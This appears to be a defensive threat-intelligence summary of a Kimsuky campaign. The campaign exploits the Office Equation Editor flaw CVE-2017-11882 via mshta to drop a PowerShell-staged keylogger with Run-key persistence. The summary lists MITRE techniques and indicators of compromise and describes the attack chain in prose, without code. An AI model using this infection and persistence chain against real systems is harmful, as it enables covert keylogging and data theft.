Kimsuky’s operation exploited a Office Equation Editor flaw (CVE-2017-11882) to drop a keylogger via an mshta-driven page. The activity includes downloading additional malware, collecting system data, and persisting through a Run key, with defenses urged to patch and update software. #Kimsuky #CVE-2017-11882 #MSOfficeEquationEditor #mshta #PowerShell #Keylogger
Keypoints
- The Kimsuky threat group exploited CVE-2017-11882 in the MS Office equation editor (EQNEDT32.EXE) to run a page with an embedded malicious script via the mshta process.
- The page the mshta connects to (error.php) is hosted on a compromised C2 site and can execute the malicious script even when the page shows a Not Found message.
- The dropped payload chain includes downloading additional malware from the C2 (PowerShell-based) and registering persistence via desktop.ini.bak under the Run key.
- A PowerShell-based first stage collects system and IP information and can download and execute a keylogger from the C2.
- The keylogger saves data to desktop.ini.bak in the UsersPublicMusic path, uses a mutex to prevent duplicate instances, and exfiltrates data to the C2 at random intervals.
- The Run-key persistence is intended to survive reboots (the script edits the Run registry under HKLM with the name “Clear Web History”).
<li The article stresses patching the vulnerability, updating software, and deploying sandbox-based defenses to prevent similar infections in the future.
MITRE Techniques
- [T1203] Exploitation for Client Execution – The threat actor exploited a vulnerability in the MS Office equation editor to run a page with an embedded malicious script using mshta. “…exploiting the vulnerability to run a page with an embedded malicious script with the mshta process…”
- [T1218.005] Mshta – mshta.exe executed via the equation editor program (EQNEDT32.exe). “mshta.exe executed via the equation editor program (EQNEDT32.exe)”
- [T1105] Ingress Tool Transfer – The malware downloads additional components from the C2 (Query=50) via a PowerShell command. “downloaded an additional malware strain from the C2 (Query=50) via a PowerShell command”
- [T1059.001] PowerShell – The PowerShell-based stage is used to download and execute further payloads. “via a PowerShell command”
- [T1082] System Information Discovery – The first PowerShell stage collects system and IP information. “collects system and IP information”
- [T1041] Exfiltration Over C2 Channel – Collected data is sent to the C2 at random times. “The collected data is sent at random times within the time range set by the threat actor to the C2”
- [T1056.001] Keylogging – The keylogger collects keystrokes and clipboard data. “recording users’ keylogging data as well as clipboard data”
- [T1547.001] Registry Run Keys/Startup Folder – Persistence by registering desktop.ini.bak in the Run key under HKLM with the name “Clear Web History.” “registering the desktop.ini.bak file in the Run key under HKLM with the name ‘Clear Web History’”
- [T1059.005] Windows Script – Mention of wscript being used; indicates Windows Script Host usage. “the part where wscript is run”
Indicators of Compromise
- [MD5] 279c86f3796d14d2a4d89049c2b3fa2d, 5bfeef520eb1e62ea2ef313bb979aeae, and d404ab9c8722fc97cceb95f258a2e70d
- [File Name] EQNEDT32.EXE – MS Office equation editor component exploited
- [File Name] desktop.ini.bak – used for keylogging persistence
- [File Name] 50.php, 107.php – script files associated with the malicious payloads
- [URL] http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php – page hosting the malicious script
- [Domain] xxxxxxxxx.xxxxxx.xxxxxxxx.com – C2 domain hosting error.php
Read more: https://asec.ahnlab.com/en/66720/